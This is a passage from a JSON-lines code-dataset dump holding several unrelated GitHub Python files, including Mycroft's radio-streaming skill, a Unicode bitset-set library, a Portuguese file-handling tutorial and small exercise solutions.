0.9\nCONF_LIKELY_MATCH = 0.7\nCONF_GENERIC_MATCH = 0.6\n\n\"\"\"\nProvides base functionality for Mycroft's radio skill.\n\"\"\"\n\n\nclass RadioFreeMycroftSkill(CommonPlaySkill):\n \"\"\"simple streaming radio skill\"\"\"\n\n def __init__(self, skill_id: str):\n super().__init__(skill_id=skill_id, name=\"Mycroft Radio Skill\")\n self._rs: Optional[RadioStations] = None\n self.current_station = None\n self.station_name = \"Mycroft Radio\"\n self.img_pth = \"\"\n self.stream_uri = \"\"\n self.fg_color = \"white\"\n self.bg_color = \"black\"\n self.genre_images = {\n \"alternative\": \"genre_alternative.svg\",\n \"classical\": \"genre_classical.svg\",\n \"country\": \"genre_country.svg\",\n \"generic\": \"genre_generic_radio.svg\",\n \"hip-hop\": \"genre_hip_hop.svg\",\n \"jazz\": \"genre_jazz.svg\",\n \"metal\": \"genre_metal.svg\",\n \"pop\": \"genre_pop.svg\",\n \"rnb\": \"genre_rnb.svg\",\n \"rock\": \"genre_rock.svg\",\n }\n 
self._is_playing = False\n self._stream_session_id: Optional[str] = None\n self.settings_change_callback = None\n # The following is for tracking how long a station has been played.\n self.current_station_uuid: Optional[str] = None\n\n def initialize(self):\n \"\"\"Wait for internet connection before accessing radio stations\"\"\"\n self.add_event(\"mycroft.ready\", self.handle_ready)\n self.register_gui_handlers()\n\n def get_language_setting(self):\n language = self.settings.get(\"language\", \"not_set\")\n if language == \"not_set\":\n language = \"english\"\n return language\n\n @property\n def rs(self) -> RadioStations:\n \"\"\"Dynamically load radio stations\"\"\"\n self._load_radio_stations()\n assert self._rs is not None\n return self._rs\n\n def handle_ready(self, _):\n self._load_radio_stations()\n\n def _load_radio_stations(self):\n if self._rs is None:\n self._rs = RadioStations(self.get_language_setting())\n\n def register_gui_handlers(self):\n \"\"\"Register handlers for events to or from the GUI.\"\"\"\n self.log.debug(\"Registering gui handlers.\")\n self.bus.on(\"mycroft.audio.service.playing\", self.handle_media_playing)\n self.bus.on(\"mycroft.audio.service.stopped\", self.handle_media_stopped)\n self.bus.on(\"play:pause\", self.handle_pause)\n self.bus.on(\"play:resume\", self.handle_resume)\n self.bus.on(\n \"mycroft.audio.queue_end\",\n self.handle_media_finished,\n )\n self.bus.on(\"register.station.click\", self.handle_station_click)\n self.gui.register_handler(\n \"cps.gui.pause\", \"RadioPlayer_mark_ii.qml\", self.handle_gui_status_change\n )\n self.gui.register_handler(\n \"cps.gui.play\", \"RadioPlayer_mark_ii.qml\", self.handle_gui_status_change\n )\n self.gui.register_handler(\n \"gui.next_station\", \"RadioPlayer_mark_ii.qml\", self.handle_next_station\n )\n self.gui.register_handler(\n \"gui.prev_station\", \"RadioPlayer_mark_ii.qml\", self.handle_previous_station\n )\n self.gui.register_handler(\n \"gui.next_genre\", \"RadioPlayer_mark_ii.qml\", self.handle_next_channel\n )\n self.gui.register_handler(\n \"gui.prev_genre\", \"RadioPlayer_mark_ii.qml\", self.handle_previous_channel\n )\n self.gui.register_handler(\n \"gui.stop_radio\",\n \"RadioPlayer_mark_ii.qml\",\n self.handle_stop_radio,\n )\n \n def handle_station_click(self, message):\n \"\"\"\n Radio Browser tracks 'clicks', meaning the number of times\n users play each station. 
To give this feedback we need to\n send a query to the server with the station uuid.\n\n For our purposes, since users don't currently have the option\n of easily playing specific stations, we will consider a station\n 'click' to have occurred after the user has allowed a given\n station to play for one minute.\n \"\"\"\n played_station_uuid = message.data.get(\"station_uuid\", \"\")\n if played_station_uuid:\n threading.Timer(60.0, self._register_station_click, args=(played_station_uuid,)).start()\n \n def _register_station_click(self, played_station_uuid):\n if played_station_uuid == self.current_station_uuid:\n # Send 'click' feedback to Radio Browser.\n resp = self.rs.query_server(\n f\"url/{played_station_uuid}\"\n )\n station_name = resp.get(\"name\", \"\")\n if station_name:\n self.log.info(f\"Registered click for {resp}\")\n \n def handle_pause(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id != self._stream_session_id:\n return\n self._audio_session_id = self._stream_session_id\n self.update_gui_values(\"RadioPlayer_mark_ii.qml\", {\"status\": \"Paused\"})\n self._is_playing = False\n self.CPS_pause()\n\n def handle_resume(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id != self._stream_session_id:\n return\n self.update_gui_values(\"RadioPlayer_mark_ii.qml\", {\"status\": \"Playing\"})\n self._is_playing = True\n self.handle_play_request()\n\n def handle_media_finished(self, message):\n \"\"\"Handle media playback finishing.\"\"\"\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self.log.warning(\"RadioMediaFinished! should never get here!\")\n\n def handle_media_playing(self, message):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self._is_playing = True\n else:\n self._is_playing = False\n\n def handle_media_stopped(self, message=None):\n mycroft_session_id = message.data.get(\"mycroft_session_id\")\n if mycroft_session_id == self._stream_session_id:\n self._is_playing = False\n\n def handle_gui_status_change(self, message):\n \"\"\"Handle play and pause status changes from the GUI.\n This notifies the audioservice. 
The GUI state only changes once the\n audioservice emits the relevant messages to say the state has changed.\n \"\"\"\n if not self._is_playing:\n return\n\n command = message.msg_type.split(\".\")[-1]\n if command == \"play\":\n self.log.info(\"Audio resumed by GUI.\")\n self.CPS_resume()\n elif command == \"pause\":\n self.log.info(\"Audio paused by GUI.\")\n self.CPS_pause()\n\n def update_radio_theme(self, status):\n self.img_pth = None\n if self.rs.genre_to_play and self.rs.genre_to_play in self.genre_images.keys():\n self.img_pth = self.find_resource(\n self.genre_images[self.rs.genre_to_play], \"ui/images\"\n )\n else:\n for genre_image_name, genre_image_path in self.genre_images.items():\n if genre_image_name in self.rs.genre_to_play:\n self.img_pth = self.find_resource(genre_image_path, \"ui/images\")\n if not self.img_pth:\n self.img_pth = self.find_resource(\"genre_generic_radio.svg\", \"ui/images\")\n\n channel_info = \"%s/%s\" % (self.rs.station_index + 1, len(self.rs.stations))\n station_name = self.current_station.get(\"name\", \"\").replace(\"\\n\", \"\")\n gui_data = {\n \"media_image\": self.img_pth,\n \"media_station\": station_name,\n \"media_genre\": self.rs.genre_to_play,\n \"media_skill\": self.skill_id,\n \"media_current_station_info\": channel_info,\n \"media_streaming\": True,\n \"media_status\": status,\n }\n return (\"RadioPlayer_mark_ii.qml\", gui_data)\n\n def setup_for_play(self, utterance):\n try:\n match_level = None\n # If this is a generic play request, we want to make\n # sure the match level is set to generic, otherwise,\n # by default, it will be set to exact. The only case\n # where this is an issue is \"Play music\" because it is\n # both generic and also has to go through CPS because\n # it will otherwise collide with the jukebox skill.\n # Hence we look for an utterance which has been stripped to\n # just \"music\".\n if utterance == \"music\":\n match_level = CPSMatchLevel.GENERIC\n self.rs.get_stations(utterance)\n self.current_station = self.rs.get_current_station()\n # Only relevant when called by CPS match.\n return match_level\n except GenreTagNotFound:\n self.log.debug(\"Genre not found exception in setup for play.\")\n # Setting to None will cause it to do the right\n # thing down the line, i.e., tell the user\n # it doesn't know how to play x.\n self.current_station = None\n\n def handle_play_request(self):\n \"\"\"play the current station if there is one\"\"\"\n if not self.current_station:\n # If there isn't a current station, that means we were unable to find\n # a genre that matches the search term.\n dialog = (\"cant.find.stations\", {\"search\": self.rs.last_search_terms})\n self._mycroft_session_id = self.emit_start_session(\n dialog=dialog, gui_clear=GuiClear.NEVER\n )\n return self.end_session(dialog=dialog)\n stream_uri = None\n station_name = None\n # station_uuid will be needed to increment clicks on the radio browser server.\n station_uuid = None\n\n # The first attempt to connect to the station server is to check mime type.\n # If we have connection problems, most of the time they will happen here.\n # In that case we will go to the next station and try again up to 10 times\n # before giving up.\n mime = None\n tries = 0\n while not mime and tries < 10:\n tries += 1\n try:\n stream_uri = self.current_station.get(\"url_resolved\", \"\")\n if stream_uri:\n self.log.debug(f\"Getting mime type for {stream_uri}\")\n else:\n self.log.error(\"No stream uri found!\")\n station_name = self.current_station.get(\"name\", 
\"\").replace(\"\\n\", \"\")\n if station_name:\n self.log.debug(f\"Getting mime type for {station_name}\")\n else:\n self.log.error(\"No station name found!\")\n station_uuid = self.current_station.get(\"stationuuid\", \"\")\n self.log.debug(f\"Attempting to check mime type: try {tries}\")\n mime = self.rs.find_mime_type(stream_uri)\n except requests.exceptions.RequestException as e:\n self.log.debug(f\"Mime type request failed: {e}\")\n self.rs.get_next_station()\n self.current_station = self.rs.get_current_station()\n if not mime:\n self.log.error(\n \"Unsuccessful mime type checks for 10 different stations, cannot connect.\"\n )\n\n self.CPS_play([stream_uri])\n\n # Send a message indicating a station has started playing.\n if station_uuid:\n self.current_station_uuid = station_uuid\n self.bus.emit(\n Message(\n \"register.station.click\",\n data={\"station_uuid\": station_uuid},\n )\n )\n else:\n self.log.debug(\"Station UUID not found, cannot register click with Radio Browser.\")\n\n gui = self.update_radio_theme(\"Now Playing\")\n self._stream_session_id = self._mycroft_session_id\n\n self._mycroft_session_id = self.emit_start_session(\n gui=gui, gui_clear=GuiClear.NEVER\n )\n\n self.CPS_send_status(image=self.img_pth, artist=station_name)\n\n # Intents\n @intent_handler(\"HelpRadio.intent\")\n def handle_radio_help(self, _):\n return self.end_session(dialog=\"radio.help\", gui_clear=GuiClear.NEVER)\n\n @intent_handler(\"ShowRadio.intent\")\n def handle_show_radio(self, _):\n dialog = None\n gui = None\n\n if self._is_playing:\n gui = \"RadioPlayer_mark_ii.qml\"\n else:\n dialog = \"no.radio.playing\"\n\n return self.end_session(dialog=dialog, gui=gui, gui_clear=GuiClear.NEVER)\n\n @intent_handler(\"NextStation.intent\")\n def handle_next_station(self, message=None):\n station_found = False\n ctr = 0\n while (not station_found) and (ctr < self.rs.get_station_count()):\n new_current_station = self.rs.get_next_station()\n self.current_station = new_current_station\n self.update_station_vars(new_current_station)\n\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error in next station\")\n\n ctr += 1\n\n @intent_handler(\"PreviousStation.intent\")\n def handle_previous_station(self, message=None):\n station_found = False\n ctr = 0\n while (not station_found) and (ctr < self.rs.get_station_count()):\n new_current_station = self.rs.get_previous_station()\n self.update_station_vars(new_current_station)\n\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error in previous station\")\n\n ctr += 1\n\n @intent_handler(\"NextChannel.intent\")\n def handle_next_channel(self, message):\n self.log.debug(\"Trying to get next channel.\")\n self.rs.get_next_channel()\n self.handle_next_station(message)\n\n @intent_handler(\"PreviousChannel.intent\")\n def handle_previous_channel(self, message):\n self.rs.get_previous_channel()\n self.handle_next_station(message)\n\n @intent_handler(AdaptIntent(\"\").require(\"Play\").require(\"Radio\"))\n def handle_play_radio(self, message):\n return self.handle_listen_intent(message)\n\n @intent_handler(\"ListenToRadio.intent\")\n def handle_listen_intent(self, message):\n self.setup_for_play(message.data.get(\"utterance\", \"\"))\n self.handle_play_request()\n\n def play_current(self):\n station_found = False\n ctr = 0\n while not station_found and ctr < self.rs.get_station_count():\n new_current_station = self.rs.get_next_station()\n 
self.update_station_vars(new_current_station)\n try:\n self.handle_play_request()\n station_found = True\n except Exception:\n self.log.exception(\"Error while playing station\")\n\n ctr += 1\n\n if not station_found:\n self.log.error(\n \"of %s stations, none work!\" % (self.rs.get_station_count(),)\n )\n\n def update_station_vars(self, new_current_station):\n self.current_station = new_current_station\n self.stream_uri = self.current_station.get(\"url_resolved\", \"\")\n self.station_name = self.current_station.get(\"name\", \"\")\n self.station_name = self.station_name.replace(\"\\n\", \" \")\n self.station_name = \" \".join(self.station_name.splitlines())\n self.current_station_uuid = self.current_station.get(\"stationuuid\", \"\")\n\n @intent_handler(\"TurnOnRadio.intent\")\n def handle_turnon_intent(self, _):\n if self.current_station is None:\n self.setup_for_play(self.rs.get_next_channel())\n self.play_current()\n\n @intent_handler(\"StopRadio.intent\")\n def handle_stop_radio(self, _):\n return self.stop()\n\n # Common query stuff\n def CPS_match_query_phrase(self, phrase: str) -> Tuple[str, float, dict]:\n \"\"\"Respond to Common Play Service query requests.\n Args:\n phrase: utterance request to parse\n Returns:\n Tuple(Name of station, confidence, Station information)\n \"\"\"\n # Translate match confidence levels to CPSMatchLevels\n self.log.debug(\"CPS Match Request\")\n match_level = self.setup_for_play(phrase) # Will be CPSMatchLevel.GENERIC or None.\n\n tags = []\n confidence = 0.0\n stream_uri = \"\"\n\n self.log.debug(f\"Current station: {self.current_station}\")\n if self.current_station:\n match_level = match_level if match_level else CPSMatchLevel.EXACT\n tags = self.current_station.get(\"tags\", [])\n confidence = self.current_station.get(\"confidence\", 0.0)\n stream_uri = self.current_station.get(\"url_resolved\", \"\")\n else:\n return None\n\n # skill specific alternations\n if len(phrase.split(\" \")) < 4:\n # 3 words or less\n confidence += 0.1\n\n if \"radio\" in phrase:\n # the term radio found\n confidence += 0.1\n\n # if we have ' by ' in our original phrase\n # we can be pretty sure we have an artist\n # and title so this will save us a lot of\n # missed intents\n if \" by \" in phrase.lower():\n confidence = 0.01\n\n skill_data = {\n \"name\": self.station_name,\n \"media_uri\": stream_uri,\n \"confidence\": confidence,\n \"tags\": tags,\n }\n self.log.error(f\"Confidence: {confidence}\")\n self.log.debug(f\"Returning: {self.station_name} {match_level} {skill_data}\")\n return self.station_name, match_level, skill_data\n\n def CPS_start(self, _, data):\n \"\"\"Handle request from Common Play System to start playback.\"\"\"\n if self.current_station is not None:\n self.handle_play_request()\n else:\n self.log.error(\n \"Can't find any matching stations for = %s\", self.rs.last_search_terms\n )\n dialog = (\"cant.find.stations\", {\"search\": self.rs.last_search_terms})\n self.gui.release()\n return self.end_session(dialog=dialog)\n\n def stop(self) -> Optional[Message]:\n \"\"\"Respond to system stop commands.\"\"\"\n if self._is_playing:\n self.CPS_send_status()\n self.CPS_release_output_focus()\n self.gui.release()\n\n def handle_gui_idle(self):\n if self._is_playing:\n gui = \"RadioPlayer_mark_ii.qml\"\n self.emit_start_session(gui=gui, gui_clear=GuiClear.NEVER)\n return True\n\n return False\n\n\ndef create_skill(skill_id: str):\n return 
RadioFreeMycroftSkill(skill_id=skill_id)\n","repo_name":"MycroftAI/mycroft-dinkum","sub_path":"skills/play-radio.mark2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19257,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"} +{"seq_id":"72204946961","text":"# escrita\nfile = open(\"arquivo.txt\", mode=\"w\")\nfile.write(\"Trybe S2\")\nfile.close()\n\n# leitura\nfile = open(\"arquivo.txt\", mode=\"r\")\ncontent = file.read()\nprint(content)\nfile.close() # não podemos esquecer de fechar o arquivo\n\n# escrita\nfile = open(\"arquivo.txt\", mode=\"w\")\nLINES = [\"Olá \", \"mundo \", \"belo \", \"do \", \"Python\"]\nfile.writelines(LINES)\nfile.close()\n\n# leitura\nfile = open(\"arquivo.txt\", mode=\"r\")\nfor line in file:\n print(line)\nfile.close()\n\n# escrita\nfile = open(\"arquivo.dat\", mode=\"wb\")\nfile.write(\n b\"C\\xc3\\xa1ssio 30\"\n) # o prefixo b em uma string indica que seu valor está codificado em bytes\nfile.close()\n\n# leitura\nfile = open(\"arquivo.dat\", mode=\"rb\")\ncontent = file.read()\nprint(content) # saída: b'C\\xc3\\xa1ssio 30'\nfile.close() # não podemos esquecer de fechar o arquivo\n","repo_name":"Fedolfo/trybe-exercises","sub_path":"Ciência de Computação/bloco 33/dia 2/introdution/manipulacao_de_arquivos.py","file_name":"manipulacao_de_arquivos.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"24527315663","text":"#\n# unicode_set.py - representing and manipulating sets of Unicode\n# characters, based on data from UCD - the Unicode Character Database\n#\n# Robert D. Cameron\n# September 8, 2014\n#\n# Licensed under Open Software License 3.0.\nimport cformat\nimport re\n\n#\n# Unicode Sparse Bitset Representation \n#\n# The Unicode Sparse Bitset representation is based on \n# (a) Dividing the Unicode codepoint space into groups of 2^k codepoints called quads.\n# (b) Specifying the quads using a run-length encoding, in which each run\n# is Empty (quads contain no members), Mixed (quads contain some members and\n# some nonmembers) or Full (all codepoints in each quad are members of the set). 
\n# (c) Explicitly listing all the quads of Mixed type.\n#\n\nEmpty = 0\nFull = -1\nMixed = 1\n\ndefault_log2_quad_bits = 5\n\nlog2_quad_bits = default_log2_quad_bits\nquad_bits = 1 << log2_quad_bits\nmod_quad_bit_mask = quad_bits - 1\nUnicodeQuadCount = int(0x110000 / quad_bits) # 2**log2_quad_bits codepoints per quad\nFullQuadMask = (1 << (quad_bits)) - 1\nrun_bytes = 4\n\n\nclass UCset:\n def __init__(self):\n self.runs = []\n self.quads = []\n\n # internal methods\n def append_run(self, runtype, runlength):\n if runlength == 0: return\n if self.runs == []:\n self.runs = [(runtype, runlength)]\n else:\n (lastruntype, lastrunlength) = self.runs[-1]\n if lastruntype == runtype:\n self.runs[-1] = (runtype, lastrunlength + runlength)\n else:\n self.runs.append((runtype, runlength))\n\n def append_quad(self, q):\n if q == 0:\n self.append_run(Empty, 1)\n elif (q & FullQuadMask) == FullQuadMask:\n self.append_run(Full, 1)\n else:\n self.append_run(Mixed, 1)\n self.quads.append(q)\n\n # printing\n def generate(self, propertyName, indent=4):\n hex_specifier = \"%%#0%ix\" % (int(quad_bits / 4) + 2)\n runtype = {-1: \"Full\", 0: \"Empty\", 1: \"Mixed\"}\n\n str = \"\\n\" + (\" \" * indent) + \"namespace {\\n\" + \\\n (\" \" * indent) + \"const static UnicodeSet::run_t __%s_runs[] = {\\n\" % propertyName + \\\n (\" \" * indent) + cformat.multiline_fill(['{%s, %i}' % (runtype[r[0]], r[1]) for r in self.runs], ',',\n indent) + \\\n \"};\\n\"\n\n if len(self.quads) == 0:\n str += (\" \" * indent) + \"const static UnicodeSet::bitquad_t * const __%s_quads = nullptr;\\n\" % propertyName\n else:\n str += (\" \" * indent) + \"const static UnicodeSet::bitquad_t __%s_quads[] = {\\n\" % propertyName + \\\n (\" \" * indent) + cformat.multiline_fill([hex_specifier % q for q in self.quads], ',', indent) + \\\n \"};\\n\"\n\n # Despite being const_cast below, neither runs nor quads will be modified by the UnicodeSet. 
If any\n # modifications are made, they first test the run/quad capacity and will observe that they 0 length\n # and allocate heap memory to make any changes\n\n str += (\" \" * indent) + \"}\\n\\n\" + \\\n (\" \" * indent) + \\\n \"const static UnicodeSet %s{const_cast<UnicodeSet::run_t *>(__%s_runs), %i, 0, \" \\\n \"const_cast<UnicodeSet::bitquad_t *>(__%s_quads), %i, 0};\\n\\n\" \\\n % (propertyName, propertyName, len(self.runs), propertyName, len(self.quads))\n\n return str\n\n def bytes(self):\n return (len(self.runs) * run_bytes) + (len(self.quads) * int(quad_bits / 8))\n\n\n#\n# Set Operations\n#\ndef empty_uset():\n e = UCset()\n e.runs = [(Empty, UnicodeQuadCount)]\n e.quads = []\n return e\n\n\ndef singleton_uset(codepoint):\n e = UCset()\n quad_no = codepoint >> log2_quad_bits\n quad_val = 1 << (codepoint & mod_quad_bit_mask)\n if quad_no > 0: e.append_run(Empty, quad_no)\n e.append_run(Mixed, 1)\n e.quads = [quad_val]\n if quad_no < UnicodeQuadCount - 1:\n e.append_run(Empty, UnicodeQuadCount - (quad_no + 1))\n return e\n\n\ndef range_uset(lo_codepoint, hi_codepoint):\n e = UCset()\n lo_quad_no = lo_codepoint >> log2_quad_bits\n hi_quad_no = hi_codepoint >> log2_quad_bits\n lo_offset = lo_codepoint & mod_quad_bit_mask\n hi_offset = hi_codepoint & mod_quad_bit_mask\n if lo_quad_no > 0: e.append_run(Empty, lo_quad_no)\n if lo_quad_no == hi_quad_no:\n quad = (FullQuadMask << lo_offset) & (FullQuadMask >> (quad_bits - 1 - hi_offset))\n e.append_quad(quad)\n else:\n e.append_quad((FullQuadMask << lo_offset) & FullQuadMask)\n e.append_run(Full, hi_quad_no - (lo_quad_no + 1))\n e.append_quad((FullQuadMask >> (quad_bits - 1 - hi_offset)) & FullQuadMask)\n if hi_quad_no < UnicodeQuadCount - 1:\n e.append_run(Empty, UnicodeQuadCount - (hi_quad_no + 1))\n return e\n\n\nclass Uset_Iterator:\n def __init__(self, uSet):\n self.uSet = uSet\n self.run_no = 0\n self.offset = 0\n self.quad_no = 0\n\n def at_end(self):\n return self.run_no == len(self.uSet.runs)\n\n def current_run(self):\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n return (this_run_type, this_run_length - self.offset)\n\n def get_quad(self):\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n if this_run_type == Empty:\n return 0\n elif this_run_type == Full:\n return FullQuadMask\n else:\n return self.uSet.quads[self.quad_no]\n\n def advance(self, n):\n while n > 0:\n (this_run_type, this_run_length) = self.uSet.runs[self.run_no]\n remain = this_run_length - self.offset\n if remain > n:\n self.offset += n\n if this_run_type == Mixed: self.quad_no += n\n n = 0\n elif remain == n:\n self.run_no += 1\n self.offset = 0\n if this_run_type == Mixed: self.quad_no += n\n n = 0\n else:\n self.run_no += 1\n self.offset = 0\n if this_run_type == Mixed: self.quad_no += remain\n n -= remain\n\n\ndef uset_member(s, codepoint):\n quad_no = int(codepoint / quad_bits)\n quad_val = 1 << (codepoint & mod_quad_bit_mask)\n it = Uset_Iterator(s)\n it.advance(quad_no)\n return (it.get_quad() & quad_val) != 0\n\n\ndef uset_popcount(s):\n popcount = 0\n it = Uset_Iterator(s)\n while not it.at_end():\n (runtype, n) = it.current_run()\n if runtype == Empty:\n it.advance(n)\n elif runtype == Full:\n popcount += n * quad_bits\n it.advance(n)\n else:\n popcount += popcount_quad(it.get_quad())\n it.advance(1)\n return popcount\n\n\ndef popcount_quad(q):\n c = 0\n while q != 0:\n q = q & (q - 1) # clear low bit\n c += 1\n return c\n\n\ndef uset_complement(s):\n iset = UCset()\n it = Uset_Iterator(s)\n while not 
it.at_end():\n (runtype, n) = it.current_run()\n if runtype == Empty:\n iset.append_run(Full, n)\n it.advance(n)\n elif runtype == Full:\n iset.append_run(Empty, n)\n it.advance(n)\n else:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ it.get_quad())\n it.advance(1)\n return iset\n\n\ndef uset_intersection(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty or s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Full:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Full:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block intersection\n for i in range(n):\n iset.append_quad(i1.get_quad() & i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_union(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty and s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full or s2_type == Full:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Empty:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() | i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_difference(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty or s2_type == Full:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Empty:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() & ~ i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_symmetric_difference(s1, s2):\n iset = UCset()\n i1 = Uset_Iterator(s1)\n i2 = Uset_Iterator(s2)\n while not i1.at_end():\n (s1_type, s1_length) = i1.current_run()\n (s2_type, s2_length) = i2.current_run()\n n = min(s1_length, s2_length)\n if s1_type == Empty and s2_type == Full or s1_type == Full and s2_type == Empty:\n iset.append_run(Full, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Full and s2_type == Full or s1_type == Empty and s2_type == Empty:\n iset.append_run(Empty, n)\n i1.advance(n)\n i2.advance(n)\n elif s1_type == Empty:\n for i in range(n):\n iset.append_quad(i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == 
Empty:\n for i in range(n):\n iset.append_quad(i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n elif s1_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i2.get_quad())\n i2.advance(1)\n i1.advance(n)\n elif s2_type == Full:\n for i in range(n):\n iset.append_quad(FullQuadMask ^ i1.get_quad())\n i1.advance(1)\n i2.advance(n)\n else: # both s1 and s2 have mixed blocks; form block-by-block union\n for i in range(n):\n iset.append_quad(i1.get_quad() ^ i2.get_quad())\n i1.advance(1)\n i2.advance(1)\n return iset\n\n\ndef uset_to_range_list(s):\n i = Uset_Iterator(s)\n rl = []\n open_range = False\n range_first = 0\n pos = 0\n while not i.at_end():\n (q_type, q_length) = i.current_run()\n if q_type == Empty:\n if open_range:\n rl.append((range_first, pos - 1))\n open_range = False\n pos += q_length * quad_bits\n i.advance(q_length)\n elif q_type == Full:\n if not open_range:\n range_first = pos\n open_range = True\n pos += q_length * quad_bits\n i.advance(q_length)\n else: # mixed quad\n q = i.get_quad()\n qpos = pos\n for qpos in range(pos, pos + quad_bits):\n if q & 1 == 0:\n if open_range:\n rl.append((range_first, qpos - 1))\n open_range = False\n else:\n if not open_range:\n range_first = qpos\n open_range = True\n q >>= 1\n qpos += 1\n pos += quad_bits\n i.advance(1)\n if open_range:\n rl.append((range_first, 0x10FFFF))\n return rl\n\n\nUCD_point_regexp = re.compile(\"^([0-9A-F]{4,6})\\s+;\")\nUCD_range_regexp = re.compile(\"^([0-9A-F]{4,6})[.][.]([0-9A-F]{4,6})\\s+;\")\n","repo_name":"parabix/parabix-devel-mirror","sub_path":"scripts/UCD/unicode_set.py","file_name":"unicode_set.py","file_ext":"py","file_size_in_byte":13695,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"42813588809","text":"from typing import List\n\n\nclass Solution:\n def dailyTemperatures(self, T: List[int]) -> List[int]:\n nxt = [float('inf')] * 102\n ans = [0] * len(T)\n for i in range(len(T) - 1, -1, -1):\n warmer_index = min(nxt[t] for t in range(T[i]+1, 102))\n if warmer_index < float('inf'):\n ans[i] = warmer_index - i\n nxt[T[i]] = i\n return ans\n\n\nif __name__ == \"__main__\":\n s = Solution()\n result = s.dailyTemperatures([73, 74, 75, 71, 69, 72, 76, 73])\n print(result)\n","repo_name":"kenwoov/PlayLeetCode","sub_path":"Algorithms/Medium/739. 
Daily Temperatures/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72000637201","text":"# Question No.2\r\n\r\nt1=(1,2,5,7,9,2,4,6,8,10)\r\nl=len(t1)\r\n#Part (a)\r\nprint(t1[0:l//2],'\\n',t1[l//2:l])\r\n\r\n#Part (b)\r\nt3=()\r\nt3=list(t3)\r\nfor i in range(0,l):\r\n if t1[i]%2==0:\r\n t3.append(t1[i])\r\nt3=tuple(t3)\r\nprint(\"The New Tuple With Even Values From Firstt Tupple:\\n\",t3)\r\n\r\n#Part (c)\r\nt2=(11,13,15)\r\nnewt=t1+t2\r\nprint(\"Concatenated Tuple Is:\",newt)\r\n\r\n#Part (d)\r\nma=max(t1) \r\nmi=min(t1) \r\nprint(\"The Maximum Value From Tuple Is:\",ma)\r\nprint(\"The Minimum Value From Tuple Is:\",mi)","repo_name":"ratz1239/python-codes","sub_path":"CS Practical.py","file_name":"CS Practical.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4362860621","text":"import torch\nfrom torch import nn\nfrom gensim.utils import tokenize\nimport argparse\nimport pickle\nimport random\nfrom typing import Any, List, Tuple, Union\nimport os\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom gensim.models import Word2Vec\nfrom tqdm import tqdm\n\n\nclass Preprocessor:\n def __init__(self, mode: str = \"test\"):\n self.mode = mode.lower()\n\n def tokenize(self, sentence: str) -> list:\n tokenized_sentence = list(tokenize(sentence, lowercase=True, deacc=True))\n return tokenized_sentence\n\n def add_special_tokens(self, sentence: list) -> list:\n 